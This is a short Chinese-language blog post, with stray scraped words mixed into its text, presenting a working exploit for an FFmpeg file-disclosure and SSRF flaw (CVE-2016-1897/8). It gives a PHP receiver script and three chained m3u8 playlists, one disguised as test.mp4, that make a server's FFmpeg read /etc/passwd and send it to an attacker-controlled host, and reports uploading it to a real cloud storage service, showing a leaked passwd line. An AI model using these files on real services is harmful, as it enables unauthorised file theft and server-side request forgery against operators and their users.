CVE-2016-1897/8 - FFMpeg vulnerability analysis

 

Vulnerability exploit methods are as follows:php

一共4個文件:



comm.php (接收用的 也能夠用監聽一個端口)
 bash

code 區域url

<?php

file_put_contents(time()."_test.txt",$_GET['x']);

?>







header.m3u8 (視頻格式文件)


 spa

code 區域ssr

#EXTM3U

#EXT-X-MEDIA-SEQUENCE:0

#EXTINF:,

http://www.u-url.org/exp/movie/comm.php?x=







remote.m3u8 (第二次轉發的)


 code

code 區域視頻

#EXTM3U

#EXT-X-MEDIA-SEQUENCE:0

#EXTINF:10.0,

concat:http://www.u-url.org/exp/movie/header.m3u8|http://baidu.com

#EXT-X-ENDLIST




 

code 區域blog

http://baidu.com  也能夠換成 本地資源文件: /etc/passwd



test.mp4 (最終上傳觸發)


 資源

code 區域rem

#EXTM3U

#EXT-X-MEDIA-SEQUENCE:0

#EXTINF:10.0,

concat:http://www.u-url.org/exp/movie/remote.m3u8

#EXT-X-ENDLIST




 

漏洞證實:

一切準備號了以後就上傳test.mp4到360雲盤上去。


 

QQ截圖20160505161656.png




 

code 區域

root:x:0:0:root:/root:/bin/bash



也能夠ssrf

Detailed content link:

https://habrahabr.ru/company/mailru/blog/274855/

相關文章
相關標籤/搜索